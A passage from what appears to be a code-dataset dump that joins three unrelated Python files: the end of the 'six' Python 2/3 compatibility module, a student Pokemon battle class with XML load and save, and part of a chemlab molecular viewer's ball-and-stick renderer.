MovedModule("html_parser", "HTMLParser", "html.parser"),
MovedModule("http_client", "httplib", "http.client"),
MovedModule("email_mime_multipart", "email.MIMEMultipart", "email.mime.multipart"),
MovedModule("email_mime_nonmultipart", "email.MIMENonMultipart", "email.mime.nonmultipart"),
MovedModule("email_mime_text", "email.MIMEText", "email.mime.text"),
MovedModule("email_mime_base", "email.MIMEBase", "email.mime.base"),
MovedModule("BaseHTTPServer", "BaseHTTPServer", "http.server"),
MovedModule("CGIHTTPServer", "CGIHTTPServer", "http.server"),
MovedModule("SimpleHTTPServer", "SimpleHTTPServer", "http.server"),
MovedModule("cPickle", "cPickle", "pickle"),
MovedModule("queue", "Queue"),
MovedModule("reprlib", "repr"),
MovedModule("socketserver", "SocketServer"),
MovedModule("_thread", "thread", "_thread"),
MovedModule("tkinter", "Tkinter"),
MovedModule("tkinter_dialog", "Dialog", "tkinter.dialog"),
MovedModule("tkinter_filedialog", "FileDialog", "tkinter.filedialog"),
MovedModule("tkinter_scrolledtext", "ScrolledText", "tkinter.scrolledtext"),
MovedModule("tkinter_simpledialog", "SimpleDialog", "tkinter.simpledialog"),
MovedModule("tkinter_tix", "Tix", "tkinter.tix"),
MovedModule("tkinter_ttk", "ttk", "tkinter.ttk"),
MovedModule("tkinter_constants", "Tkconstants", "tkinter.constants"),
MovedModule("tkinter_dnd", "Tkdnd", "tkinter.dnd"),
MovedModule("tkinter_colorchooser", "tkColorChooser",
"tkinter.colorchooser"),
MovedModule("tkinter_commondialog", "tkCommonDialog",
"tkinter.commondialog"),
MovedModule("tkinter_tkfiledialog", "tkFileDialog", "tkinter.filedialog"),
MovedModule("tkinter_font", "tkFont", "tkinter.font"),
MovedModule("tkinter_messagebox", "tkMessageBox", "tkinter.messagebox"),
MovedModule("tkinter_tksimpledialog", "tkSimpleDialog",
"tkinter.simpledialog"),
MovedModule("urllib_parse", __name__ + ".moves.urllib_parse", "urllib.parse"),
MovedModule("urllib_error", __name__ + ".moves.urllib_error", "urllib.error"),
MovedModule("urllib", __name__ + ".moves.urllib", __name__ + ".moves.urllib"),
MovedModule("urllib_robotparser", "robotparser", "urllib.robotparser"),
MovedModule("xmlrpc_client", "xmlrpclib", "xmlrpc.client"),
MovedModule("xmlrpc_server", "SimpleXMLRPCServer", "xmlrpc.server"),
]
# Add windows specific modules.
if sys.platform == "win32":
_moved_attributes += [
MovedModule("winreg", "_winreg"),
]
for attr in _moved_attributes:
setattr(_MovedItems, attr.name, attr)
if isinstance(attr, MovedModule):
_importer._add_module(attr, "moves." + attr.name)
del attr
_MovedItems._moved_attributes = _moved_attributes
moves = _MovedItems(__name__ + ".moves")
_importer._add_module(moves, "moves")
class Module_six_moves_urllib_parse(_LazyModule):
"""Lazy loading of moved objects in six.moves.urllib_parse"""
_urllib_parse_moved_attributes = [
MovedAttribute("ParseResult", "urlparse", "urllib.parse"),
MovedAttribute("SplitResult", "urlparse", "urllib.parse"),
MovedAttribute("parse_qs", "urlparse", "urllib.parse"),
MovedAttribute("parse_qsl", "urlparse", "urllib.parse"),
MovedAttribute("urldefrag", "urlparse", "urllib.parse"),
MovedAttribute("urljoin", "urlparse", "urllib.parse"),
MovedAttribute("urlparse", "urlparse", "urllib.parse"),
MovedAttribute("urlsplit", "urlparse", "urllib.parse"),
MovedAttribute("urlunparse", "urlparse", "urllib.parse"),
MovedAttribute("urlunsplit", "urlparse", "urllib.parse"),
MovedAttribute("quote", "urllib", "urllib.parse"),
MovedAttribute("quote_plus", "urllib", "urllib.parse"),
MovedAttribute("unquote", "urllib", "urllib.parse"),
MovedAttribute("unquote_plus", "urllib", "urllib.parse"),
MovedAttribute("urlencode", "urllib", "urllib.parse"),
MovedAttribute("splitquery", "urllib", "urllib.parse"),
MovedAttribute("splittag", "urllib", "urllib.parse"),
MovedAttribute("splituser", "urllib", "urllib.parse"),
MovedAttribute("uses_fragment", "urlparse", "urllib.parse"),
MovedAttribute("uses_netloc", "urlparse", "urllib.parse"),
MovedAttribute("uses_params", "urlparse", "urllib.parse"),
MovedAttribute("uses_query", "urlparse", "urllib.parse"),
MovedAttribute("uses_relative", "urlparse", "urllib.parse"),
]
for attr in _urllib_parse_moved_attributes:
setattr(Module_six_moves_urllib_parse, attr.name, attr)
del attr
Module_six_moves_urllib_parse._moved_attributes = _urllib_parse_moved_attributes
_importer._add_module(Module_six_moves_urllib_parse(__name__ + ".moves.urllib_parse"),
"moves.urllib_parse", "moves.urllib.parse")
class Module_six_moves_urllib_error(_LazyModule):
"""Lazy loading of moved objects in six.moves.urllib_error"""
_urllib_error_moved_attributes = [
MovedAttribute("URLError", "urllib2", "urllib.error"),
MovedAttribute("HTTPError", "urllib2", "urllib.error"),
MovedAttribute("ContentTooShortError", "urllib", "urllib.error"),
]
for attr in _urllib_error_moved_attributes:
setattr(Module_six_moves_urllib_error, attr.name, attr)
del attr
Module_six_moves_urllib_error._moved_attributes = _urllib_error_moved_attributes
_importer._add_module(Module_six_moves_urllib_error(__name__ + ".moves.urllib.error"),
"moves.urllib_error", "moves.urllib.error")
class Module_six_moves_urllib_request(_LazyModule):
"""Lazy loading of moved objects in six.moves.urllib_request"""
_urllib_request_moved_attributes = [
MovedAttribute("urlopen", "urllib2", "urllib.request"),
MovedAttribute("install_opener", "urllib2", "urllib.request"),
MovedAttribute("build_opener", "urllib2", "urllib.request"),
MovedAttribute("pathname2url", "urllib", "urllib.request"),
MovedAttribute("url2pathname", "urllib", "urllib.request"),
MovedAttribute("getproxies", "urllib", "urllib.request"),
MovedAttribute("Request", "urllib2", "urllib.request"),
MovedAttribute("OpenerDirector", "urllib2", "urllib.request"),
MovedAttribute("HTTPDefaultErrorHandler", "urllib2", "urllib.request"),
MovedAttribute("HTTPRedirectHandler", "urllib2", "urllib.request"),
MovedAttribute("HTTPCookieProcessor", "urllib2", "urllib.request"),
MovedAttribute("ProxyHandler", "urllib2", "urllib.request"),
MovedAttribute("BaseHandler", "urllib2", "urllib.request"),
MovedAttribute("HTTPPasswordMgr", "urllib2", "urllib.request"),
MovedAttribute("HTTPPasswordMgrWithDefaultRealm", "urllib2", "urllib.request"),
MovedAttribute("AbstractBasicAuthHandler", "urllib2", "urllib.request"),
MovedAttribute("HTTPBasicAuthHandler", "urllib2", "urllib.request"),
MovedAttribute("ProxyBasicAuthHandler", "urllib2", "urllib.request"),
MovedAttribute("AbstractDigestAuthHandler", "urllib2", "urllib.request"),
MovedAttribute("HTTPDigestAuthHandler", "urllib2", "urllib.request"),
MovedAttribute("ProxyDigestAuthHandler", "urllib2", "urllib.request"),
MovedAttribute("HTTPHandler", "urllib2", "urllib.request"),
MovedAttribute("HTTPSHandler", "urllib2", "urllib.request"),
MovedAttribute("FileHandler", "urllib2", "urllib.request"),
MovedAttribute("FTPHandler", "urllib2", "urllib.request"),
MovedAttribute("CacheFTPHandler", "urllib2", "urllib.request"),
MovedAttribute("UnknownHandler", "urllib2", "urllib.request"),
MovedAttribute("HTTPErrorProcessor", "urllib2", "urllib.request"),
MovedAttribute("urlretrieve", "urllib", "urllib.request"),
MovedAttribute("urlcleanup", "urllib", "urllib.request"),
MovedAttribute("URLopener", "urllib", "urllib.request"),
MovedAttribute("FancyURLopener", "urllib", "urllib.request"),
MovedAttribute("proxy_bypass", "urllib", "urllib.request"),
]
for attr in _urllib_request_moved_attributes:
setattr(Module_six_moves_urllib_request, attr.name, attr)
del attr
Module_six_moves_urllib_request._moved_attributes = _urllib_request_moved_attributes
_importer._add_module(Module_six_moves_urllib_request(__name__ + ".moves.urllib.request"),
"moves.urllib_request", "moves.urllib.request")
class Module_six_moves_urllib_response(_LazyModule):
"""Lazy loading of moved objects in six.moves.urllib_response"""
_urllib_response_moved_attributes = [
MovedAttribute("addbase", "urllib", "urllib.response"),
MovedAttribute("addclosehook", "urllib", "urllib.response"),
MovedAttribute("addinfo", "urllib", "urllib.response"),
MovedAttribute("addinfourl", "urllib", "urllib.response"),
]
for attr in _urllib_response_moved_attributes:
setattr(Module_six_moves_urllib_response, attr.name, attr)
del attr
Module_six_moves_urllib_response._moved_attributes = _urllib_response_moved_attributes
_importer._add_module(Module_six_moves_urllib_response(__name__ + ".moves.urllib.response"),
"moves.urllib_response", "moves.urllib.response")
class Module_six_moves_urllib_robotparser(_LazyModule):
"""Lazy loading of moved objects in six.moves.urllib_robotparser"""
_urllib_robotparser_moved_attributes = [
MovedAttribute("RobotFileParser", "robotparser", "urllib.robotparser"),
]
for attr in _urllib_robotparser_moved_attributes:
setattr(Module_six_moves_urllib_robotparser, attr.name, attr)
del attr
Module_six_moves_urllib_robotparser._moved_attributes = _urllib_robotparser_moved_attributes
_importer._add_module(Module_six_moves_urllib_robotparser(__name__ + ".moves.urllib.robotparser"),
"moves.urllib_robotparser", "moves.urllib.robotparser")
class Module_six_moves_urllib(types.ModuleType):
"""Create a six.moves.urllib namespace that resembles the Python 3 namespace"""
__path__ = [] # mark as package
parse = _importer._get_module("moves.urllib_parse")
error = _importer._get_module("moves.urllib_error")
request = _importer._get_module("moves.urllib_request")
response = _importer._get_module("moves.urllib_response")
robotparser = _importer._get_module("moves.urllib_robotparser")
def __dir__(self):
return ['parse', 'error', 'request', 'response', 'robotparser']
_importer._add_module(Module_six_moves_urllib(__name__ + ".moves.urllib"),
"moves.urllib")
def add_move(move):
"""Add an item to six.moves."""
setattr(_MovedItems, move.name, move)
def remove_move(name):
"""Remove item from six.moves."""
try:
delattr(_MovedItems, name)
except AttributeError:
try:
del moves.__dict__[name]
except KeyError:
raise AttributeError("no such move, %r" % (name,))
if PY3:
_meth_func = "__func__"
_meth_self = "__self__"
_func_closure = "__closure__"
_func_code = "__code__"
_func_defaults = "__defaults__"
_func_globals = "__globals__"
else:
_meth_func = "im_func"
_meth_self = "im_self"
_func_closure = "func_closure"
_func_code = "func_code"
_func_defaults = "func_defaults"
_func_globals = "func_globals"
try:
advance_iterator = next
except NameError:
def advance_iterator(it):
return it.next()
next = advance_iterator
try:
callable = callable
except NameError:
def callable(obj):
return any("__call__" in klass.__dict__ for klass in type(obj).__mro__)
if PY3:
def get_unbound_function(unbound):
return unbound
create_bound_method = types.MethodType
def create_unbound_method(func, cls):
return func
Iterator = object
else:
def get_unbound_function(unbound):
return unbound.im_func
def create_bound_method(func, obj):
return types.MethodType(func, obj, obj.__class__)
def create_unbound_method(func, cls):
return types.MethodType(func, None, cls)
class Iterator(object):
def next(self):
return type(self).__next__(self)
callable = callable
_add_doc(get_unbound_function,
"""Get the function out of a possibly unbound function""")
get_method_function = operator.attrgetter(_meth_func)
get_method_self = operator.attrgetter(_meth_self)
get_function_closure = operator.attrgetter(_func_closure)
get_function_code = operator.attrgetter(_func_code)
get_function_defaults = operator.attrgetter(_func_defaults)
get_function_globals = operator.attrgetter(_func_globals)
if PY3:
def iterkeys(d, **kw):
return iter(d.keys(**kw))
def itervalues(d, **kw):
return iter(d.values(**kw))
def iteritems(d, **kw):
return iter(d.items(**kw))
def iterlists(d, **kw):
return iter(d.lists(**kw))
viewkeys = operator.methodcaller("keys")
viewvalues = operator.methodcaller("values")
viewitems = operator.methodcaller("items")
else:
def iterkeys(d, **kw):
return d.iterkeys(**kw)
def itervalues(d, **kw):
return d.itervalues(**kw)
def iteritems(d, **kw):
return d.iteritems(**kw)
def iterlists(d, **kw):
return d.iterlists(**kw)
viewkeys = operator.methodcaller("viewkeys")
viewvalues = operator.methodcaller("viewvalues")
viewitems = operator.methodcaller("viewitems")
_add_doc(iterkeys, "Return an iterator over the keys of a dictionary.")
_add_doc(itervalues, "Return an iterator over the values of a dictionary.")
_add_doc(iteritems,
"Return an iterator over the (key, value) pairs of a dictionary.")
_add_doc(iterlists,
"Return an iterator over the (key, [values]) pairs of a dictionary.")
if PY3:
def b(s):
return s.encode("latin-1")
def u(s):
return s
unichr = chr
import struct
int2byte = struct.Struct(">B").pack
del struct
byte2int = operator.itemgetter(0)
indexbytes = operator.getitem
iterbytes = iter
import io
StringIO = io.StringIO
BytesIO = io.BytesIO
_assertCountEqual = "assertCountEqual"
if sys.version_info[1] <= 1:
_assertRaisesRegex = "assertRaisesRegexp"
_assertRegex = "assertRegexpMatches"
else:
_assertRaisesRegex = "assertRaisesRegex"
_assertRegex = "assertRegex"
else:
def b(s):
return s
# Workaround for standalone backslash
def u(s):
return unicode(s.replace(r'\\', r'\\\\'), "unicode_escape")
unichr = unichr
int2byte = chr
def byte2int(bs):
return ord(bs[0])
def indexbytes(buf, i):
return ord(buf[i])
iterbytes = functools.partial(itertools.imap, ord)
import StringIO
StringIO = BytesIO = StringIO.StringIO
_assertCountEqual = "assertItemsEqual"
_assertRaisesRegex = "assertRaisesRegexp"
_assertRegex = "assertRegexpMatches"
_add_doc(b, """Byte literal""")
_add_doc(u, """Text literal""")
def assertCountEqual(self, *args, **kwargs):
return getattr(self, _assertCountEqual)(*args, **kwargs)
def assertRaisesRegex(self, *args, **kwargs):
return getattr(self, _assertRaisesRegex)(*args, **kwargs)
def assertRegex(self, *args, **kwargs):
return getattr(self, _assertRegex)(*args, **kwargs)
if PY3:
exec_ = getattr(moves.builtins, "exec")
def reraise(tp, value, tb=None):
if value is None:
value = tp()
if value.__traceback__ is not tb:
raise value.with_traceback(tb)
raise value
else:
def exec_(_code_, _globs_=None, _locs_=None):
"""Execute code in a namespace."""
if _globs_ is None:
frame = sys._getframe(1)
_globs_ = frame.f_globals
if _locs_ is None:
_locs_ = frame.f_locals
del frame
elif _locs_ is None:
_locs_ = _globs_
exec("""exec _code_ in _globs_, _locs_""")
exec_("""def reraise(tp, value, tb=None):
raise tp, value, tb
""")
if sys.version_info[:2] == (3, 2):
exec_("""def raise_from(value, from_value):
if from_value is None:
raise value
raise value from from_value
""")
elif sys.version_info[:2] > (3, 2):
exec_("""def raise_from(value, from_value):
raise value from from_value
""")
else:
def raise_from(value, from_value):
raise value
print_ = getattr(moves.builtins, "print", None)
if print_ is None:
def print_(*args, **kwargs):
"""The new-style print function for Python 2.4 and 2.5."""
fp = kwargs.pop("file", sys.stdout)
if fp is None:
return
def write(data):
if not isinstance(data, basestring):
data = str(data)
# If the file has an encoding, encode unicode with it.
if (isinstance(fp, file) and
isinstance(data, unicode) and
fp.encoding is not None):
errors = getattr(fp, "errors", None)
if errors is None:
errors = "strict"
data = data.encode(fp.encoding, errors)
fp.write(data)
want_unicode = False
sep = kwargs.pop("sep", None)
if sep is not None:
if isinstance(sep, unicode):
want_unicode = True
elif not isinstance(sep, str):
raise TypeError("sep must be None or a string")
end = kwargs.pop("end", None)
if end is not None:
if isinstance(end, unicode):
want_unicode = True
elif not isinstance(end, str):
raise TypeError("end must be None or a string")
if kwargs:
raise TypeError("invalid keyword arguments to print()")
if not want_unicode:
for arg in args:
if isinstance(arg, unicode):
want_unicode = True
break
if want_unicode:
newline = unicode("\n")
space = unicode(" ")
else:
newline = "\n"
space = " "
if sep is None:
sep = space
if end is None:
end = newline
for i, arg in enumerate(args):
if i:
write(sep)
write(arg)
write(end)
if sys.version_info[:2] < (3, 3):
_print = print_
def print_(*args, **kwargs):
fp = kwargs.get("file", sys.stdout)
flush = kwargs.pop("flush", False)
_print(*args, **kwargs)
if flush and fp is not None:
fp.flush()
_add_doc(reraise, """Reraise an exception.""")
if sys.version_info[0:2] < (3, 4):
def wraps(wrapped, assigned=functools.WRAPPER_ASSIGNMENTS,
updated=functools.WRAPPER_UPDATES):
def wrapper(f):
f = functools.wraps(wrapped, assigned, updated)(f)
f.__wrapped__ = wrapped
return f
return wrapper
else:
wraps = functools.wraps
def with_metaclass(meta, *bases):
"""Create a base class with a metaclass."""
# This requires a bit of explanation: the basic idea is to make a dummy
# metaclass for one level of class instantiation that replaces itself with
# the actual metaclass.
class metaclass(meta):
def __new__(cls, name, this_bases, d):
return meta(name, bases, d)
return type.__new__(metaclass, 'temporary_class', (), {})
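# Illustrative usage sketch (the names Meta, Base and MyClass are hypothetical):
# with_metaclass() lets one class statement apply a metaclass under both
# Python 2 and Python 3, avoiding either version's native metaclass syntax.
#
#   class Meta(type):
#       pass
#
#   class Base(object):
#       pass
#
#   class MyClass(with_metaclass(Meta, Base)):
#       pass
#
#   assert type(MyClass) is Meta and issubclass(MyClass, Base)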
def add_metaclass(metaclass):
"""Class decorator for creating a class with a metaclass."""
def wrapper(cls):
orig_vars = cls.__dict__.copy()
slots = orig_vars.get('__slots__')
if slots is not None:
if isinstance(slots, str):
slots = [slots]
for slots_var in slots:
orig_vars.pop(slots_var)
orig_vars.pop('__dict__', None)
orig_vars.pop('__weakref__', None)
return metaclass(cls.__name__, cls.__bases__, orig_vars)
return wrapper
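# Illustrative usage sketch (reusing the hypothetical Meta from above): the
# decorator form rebuilds the decorated class with the given metaclass, which
# is why __slots__, __dict__ and __weakref__ are stripped from the original
# class body.
#
#   @add_metaclass(Meta)
#   class MyOtherClass(object):
#       pass
#
#   assert type(MyOtherClass) is Meta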
def python_2_unicode_compatible(klass):
"""
A decorator that defines __unicode__ and __str__ methods under Python 2.
Under Python 3 it does nothing.
To support Python 2 and 3 with a single code base, define a __str__ method
returning text and apply this decorator to the class.
"""
if PY2:
if '__str__' not in klass.__dict__:
raise ValueError("@python_2_unicode_compatible cannot be applied "
"to %s because it doesn't define __str__()." %
klass.__name__)
klass.__unicode__ = klass.__str__
klass.__str__ = lambda self: self.__unicode__().encode('utf-8')
return klass
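# Illustrative usage sketch (hypothetical class): define __str__ to return
# text; under Python 2 the decorator moves it to __unicode__ and installs a
# UTF-8-encoding __str__ in its place.
#
#   @python_2_unicode_compatible
#   class Greeting(object):
#       def __str__(self):
#           return u'héllo'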
# Complete the moves implementation.
# This code is at the end of this module to speed up module loading.
# Turn this module into a package.
__path__ = [] # required for PEP 302 and PEP 451
__package__ = __name__ # see PEP 366 @ReservedAssignment
if globals().get("__spec__") is not None:
__spec__.submodule_search_locations = [] # PEP 451 @UndefinedVariable
# Remove other six meta path importers, since they cause problems. This can
# happen if six is removed from sys.modules and then reloaded. (Setuptools does
# this for some reason.)
if sys.meta_path:
for i, importer in enumerate(sys.meta_path):
# Here's some real nastiness: Another "instance" of the six module might
# be floating around. Therefore, we can't use isinstance() to check for
# the six meta path importer, since the other six instance will have
# inserted an importer with different class.
if (type(importer).__name__ == "_SixMetaPathImporter" and
importer.name == __name__):
del sys.meta_path[i]
break
del i, importer
# Finally, add the importer to the meta path import hook.
sys.meta_path.append(_importer)
| mit |
andredalton/bcc | 2014/MAC0242/Projeto/pokemon/pokemon.py | 1 | 8640 | # Usado pra receber arquivos XML
import sys
# Used to validate and manipulate XML
from lxml import etree
from lxml.etree import XMLSyntaxError, Element, SubElement
# The kinds are ordered in kind_list; kind_dict is used to look a kind object up by name.
from .kind import kind_list, kind_dict, blank, bug, dragon,\
eletric, fighting, flying, fire, ghost,\
grass, ground, ice, normal, poison, psychic, rock, water
# There is now a single Attack class plus a Struggle specialization
from .attack.attack import Attack
from .attack.struggle import Struggle
class Pokemon():
""" Pokemon."""
def __init__(self):
self.name = ""
self.level = 0
self.HP = 0
self.ATK = 0
self.DEF = 0
self.SPD = 0
self.SPC = 0
self.kinds = []
self.attacks = [Struggle(self), None, None, None, None]
self.nattack = 0
self.auto = False
self.auto_attack = None
def get_name(self):
return self.name
def get_level(self):
return self.level
def get_HP(self):
return self.HP
def get_ATK(self):
return self.ATK
def get_DEF(self):
return self.DEF
def get_SPC(self):
return self.SPC
def get_SPD(self):
return self.SPD
def get_kind(self, n):
return self.kinds[n]
def get_attack(self, n):
return self.attacks[n]
def get_damage(self, damage):
if self.HP < damage:
self.HP = 0
else:
self.HP -= int(damage)
def get_nattack(self):
return self.nattack
def set_auto(self):
self.auto = True
def get_auto(self):
return self.auto
def left_pp(self):
pp = 0
for i in range(1, 5):
if self.attacks[i] is not None:
pp += self.attacks[i].get_pp()
return pp
def select_attack(self, n):
if self.attacks[n] is not None:
if self.attacks[n].get_pp()>0:
return self.attacks[n]
else:
print("No PP left for this move!")
return None
def load_xml(self, pk):
""" Recebe um lxml.etree com um pokemon já validado e inicializa o objeto. """
if pk is None:
return None
atb = pk.find("attributes")
kinds = pk.findall("type")
attacks = pk.findall("attacks")
self.name = pk.find("name").text
self.level = int(pk.find("level").text)
self.HP = int(atb.find("health").text)
self.ATK = int(atb.find("attack").text)
self.DEF = int(atb.find("defense").text)
self.SPD = int(atb.find("speed").text)
self.SPC = int(atb.find("special").text)
for tp in pk.findall("type"):
try:
try:
self.kinds.append(kind_list[int(tp.text)])
except KeyError:
self.kinds.append(kind_dict["blank"])
except IndexError:
pass
if len(self.kinds)<2:
self.kinds.append(kind_dict["blank"])
for att in attacks:
ida = int(att.find("id").text)
namea = att.find("name").text
try:
tp = kind_list[int(att.find("type").text)]
except KeyError:
tp = kind_dict["blank"]
power = int(att.find("power").text)
acc = int(att.find("accuracy").text)
pp = int(att.find("power_points").text)
self.attacks[ida] = Attack(namea, tp, acc, power, pp, self)
self.nattack += 1
return True
def make_xml(self):
""" Método que gera um nó XML para este pokemon. """
pokemon = Element("pokemon")
name = SubElement(pokemon, 'name')
name.text = self.name
level = SubElement(pokemon, 'level')
level.text = str(self.level)
attributes = SubElement(pokemon, 'attributes')
health = SubElement(attributes, 'health')
health.text = str(self.HP)
attack = SubElement(attributes, 'attack')
attack.text = str(self.ATK)
defense = SubElement(attributes, 'defense')
defense.text = str(self.DEF)
speed = SubElement(attributes, 'speed')
speed.text = str(self.SPD)
special = SubElement(attributes, 'special')
special.text = str(self.SPC)
type1 = SubElement(pokemon, 'type')
type1.text = str(kind_list.index(self.kinds[0]))
if self.kinds[1] != blank and self.kinds[1] is not None:
type2 = SubElement(pokemon, 'type')
type2.text = str(kind_list.index(self.kinds[1]))
attacks = []
for i in range(4):
att = self.attacks[i+1]
if att is not None:
attacks.append({})
attacks[i]['top'] = SubElement(pokemon, 'attacks')
attacks[i]['id'] = SubElement(attacks[i]['top'], 'id')
attacks[i]['id'].text = str(i+1)
attacks[i]['name'] = SubElement(attacks[i]['top'], 'name')
attacks[i]['name'].text = str(att.get_name())
attacks[i]['type'] = SubElement(attacks[i]['top'], 'type')
attacks[i]['type'].text = str(kind_list.index(att.get_TYP()))
attacks[i]['power'] = SubElement(attacks[i]['top'], 'power')
attacks[i]['power'].text = str(att.get_PWR())
attacks[i]['accuracy'] = SubElement(attacks[i]['top'], 'accuracy')
attacks[i]['accuracy'].text = str(att.get_ACU())
attacks[i]['power_points'] = SubElement(attacks[i]['top'], 'power_points')
attacks[i]['power_points'].text = str(att.get_pp())
return pokemon
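    # Illustrative sketch (`pika` is a hypothetical, already initialized
    # Pokemon instance): the returned node can be serialized with lxml.
    #
    #   from lxml import etree
    #   xml_bytes = etree.tostring(pika.make_xml(), pretty_print=True)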
def load(self, f=sys.stdin):
self.name = f.readline().strip()
self.level = int(f.readline())
self.HP = int(f.readline())
self.ATK = int(f.readline())
self.DEF = int(f.readline())
self.SPD = int(f.readline())
self.SPC = int(f.readline())
tp1 = f.readline().strip().lower()
tp2 = f.readline().strip().lower()
try:
self.kinds.append(kind_dict[tp1])
except (KeyError):
self.kinds.append(kind_dict["blank"])
try:
self.kinds.append(kind_dict[tp2])
except (KeyError):
self.kinds.append(kind_dict["blank"])
self.nattack = int(f.readline())
if self.nattack > 4:
self.nattack = 4
for i in range(self.nattack):
nameh = f.readline().strip()
try:
tp = kind_dict[f.readline().strip().lower()]
except KeyError:
tp = kind_dict["blank"]
acc = int(f.readline())
power = int(f.readline())
pp = int(f.readline())
self.attacks[i+1] = Attack(nameh, tp, acc, power, pp, self)
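    # Note on the plain-text format consumed by load(): one value per line, in
    # this order: name, level, HP, ATK, DEF, SPD, SPC, type 1, type 2, number
    # of attacks, then for each attack: name, type, accuracy, power, PP.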
def print_attack(self, ppm=None):
""" Método que imprime as opções de ataque deste pokemon. """
if self.left_pp() > 0:
for i in range(4):
a = self.attacks[i+1]
if a is None:
break
if ppm is not None:
params = {"n":i+1, "name":a.get_name(), "pp":a.get_pp(), "ppm":ppm[i+1]}
else:
params = {"n":i+1, "name":a.get_name(), "pp":a.get_pp(), "ppm":a.get_ppm()}
if a is not None:
print("%(n)d - %(name)s (%(pp)d/%(ppm)d)" % params)
return True
return False
def on_my_own(self, other):
"""
Método que calcula qual o melhor ataque para este pokémon contra o other.
É calculado apenas no ínicio da batalha.
"""
if self.auto_attack is None:
            d = 0  # Damage
            a = 0  # Attack number
for i in range(1, self.nattack+1):
if self.attacks[i] is None:
break
if self.attacks[i].get_pp() == 0:
continue
self.attacks[i].prepare(other)
                dt = 0  # Running damage total for this attack
for j in range(1000):
dt += self.attacks[i].damage()
                # Mean damage of this attack over the 1000 samples, weighted by its accuracy
                dt *= self.attacks[i].get_ACU()/100000
if d < dt:
d = dt
a = i
self.auto_attack = a
return self.auto_attack | apache-2.0 |
moxon6/chemlab | build/lib/chemlab/mviewer/representations/ballandstick.py | 6 | 13485 | import numpy as np
import itertools
from .obsarray import obsarray
from .state import SystemHiddenState, SystemSelectionState, ArrayState
from .state import Selection
from ...graphics.renderers import (SphereImpostorRenderer,
CylinderImpostorRenderer, AtomRenderer,
BondRenderer, BoxRenderer)
from ...graphics import colors
from ...graphics.pickers import SpherePicker, CylinderPicker
from ...db import ChemlabDB
from ...graphics.postprocessing import GlowEffect
from PyQt4 import QtCore
cdb = ChemlabDB()
vdw_radii = cdb.get('data', 'vdwdict')
elements = cdb.get('data', 'elements')
from ..events import Model, Event
class BallAndStickRepresentation(Model):
atom_clicked = Event()
bond_clicked = Event()
@property
def atom_colors(self):
return self.color_state
@atom_colors.setter
def atom_colors(self, value):
self.color_state.array = value
self.on_atom_colors_changed()
def on_atom_colors_changed(self):
self.atom_renderer.update_colors(self.color_state.array)
self.on_atom_selection_changed() # Hack
self.viewer.widget.update()
def __init__(self, viewer, system):
        self._callbacks = {}  # TODO: This is because the Model class doesn't work
self.system = system
self.viewer = viewer
self.color_scheme = colors.default_atom_map
# Model classes
self.hidden_state = {'atoms': Selection([], system.n_atoms),
'bonds': Selection([], system.n_bonds),
'box': Selection([], 1)}
self.selection_state = {'atoms': Selection([], system.n_atoms),
'bonds': Selection([], system.n_bonds),
'box': Selection([], 1)}
self.color_state = ArrayState([colors.default_atom_map.get(t, colors.deep_pink) for t in system.type_array])
self.radii_state = ArrayState([vdw_radii.get(t) * 0.3 for t in system.type_array])
# Visualization classes
self.atom_renderer = self.viewer.add_renderer(SphereImpostorRenderer,
system.r_array,
self.radii_state.array,
self.color_state.array)
self.bond_renderer = self.viewer.add_renderer(BondRenderer,
system.bonds, system.r_array,
system.type_array, style='impostors')
self.box_renderer = self.viewer.add_renderer(BoxRenderer,
system.box_vectors,
color=(100, 100, 100, 255))
self.scale_factors = np.ones_like(self.radii_state.array)
self.bond_radii = np.array(self.bond_renderer.radii)
self.bond_colors = self.bond_renderer.colors_a, self.bond_renderer.colors_b
# For highlight, we'll see
self.viewer.add_post_processing(GlowEffect)
# User controls
self.atom_picker = SpherePicker(self.viewer.widget, system.r_array,
self.radii_state.array)
self.bond_picker = CylinderPicker(self.viewer.widget,
system.r_array.take(system.bonds, axis=0),
self.bond_radii)
self.color_state.changed.connect(self.on_atom_colors_changed)
self.glow_timer = QtCore.QTimer()
def visible_atoms(self):
return self.hidden_state['atoms'].invert().indices
def _gen_atom_renderer(self):
pass
def _gen_cylinder_renderer(self):
pass
def update_box(self, vectors):
self.box_renderer.vectors = vectors.copy()
def update_scale_factors(self, scalefac):
self.scale_factors = scalefac
radii = np.array(self.radii_state.array) * scalefac
self.atom_renderer.update_radii(radii)
self.viewer.widget.update()
def update_positions(self, r_array):
self.bond_renderer.update_positions(r_array)
self.atom_renderer.update_positions(r_array)
# User controls
hmsk = self.hidden_state['bonds'].invert().indices # Visible
va = self.visible_atoms()
self.atom_picker = SpherePicker(self.viewer.widget, r_array[va],
self.radii_state.array[va])
self.bond_picker = CylinderPicker(self.viewer.widget,
r_array.take(self.system.bonds[hmsk], axis=0),
self.bond_radii[hmsk])
def on_atom_hidden_changed(self):
# When hidden state changes, the view update itself
# Update the Renderers and the pickers
#no_sel = self.selection_state['atoms'].indices
# Take everything else
#sel = np.ones(self.system.n_atoms, dtype='bool')
#sel[self.hidden_state['atoms'].mask] = False
#sel[no_sel] = False
sel = self.hidden_state['atoms'].invert().mask
self.atom_renderer.hide(sel)
# Pickers
self.atom_picker = SpherePicker(self.viewer.widget, self.system.r_array[sel],
self.radii_state.array[sel])
# Reset selection
self.selection_state['atoms'] = Selection([], self.system.n_atoms)
self.on_atom_selection_changed()
self.viewer.update()
def on_bond_hidden_changed(self):
# When hidden state changes, the view update itself
# Update the renderers and the pickers
sel = self.hidden_state['bonds'].invert().indices
system = self.system
# We need to update the pickers...
self.bond_picker = CylinderPicker(
self.viewer.widget,
system.r_array.take(self.system.bonds, axis=0)[sel, :],
self.bond_radii[sel])
# And the bond renderer
self.viewer.remove_renderer(self.bond_renderer)
self.bond_renderer = self.viewer.add_renderer(BondRenderer,
system.bonds[sel], system.r_array,
system.type_array, style='impostors')
self.viewer.update()
def on_atom_selection_changed(self):
#self.glow_timer.stop()
# When selection state changes, the view update itself
sel = self.selection_state['atoms'].indices
cols = np.array(self.atom_colors.array)
cols[sel, -1] = 50
self.atom_renderer.update_colors(cols)
self.viewer.update()
def on_bond_selection_changed(self):
# When selection state changes, the view update itself
if self.system.n_bonds == 0:
return
sel = self.selection_state['bonds'].indices
cols_a, cols_b = self.bond_colors
cols_a = cols_a.copy()
cols_b = cols_b.copy()
cols_a[sel, -1] = 50
cols_b[sel, -1] = 50
hmsk = self.hidden_state['bonds'].invert().indices
self.bond_renderer.update_colors(cols_a[hmsk], cols_b[hmsk])
def on_click(self, x, y):
# This is basically our controller
x, y = self.viewer.widget.screen_to_normalized(x, y)
# I need another picker
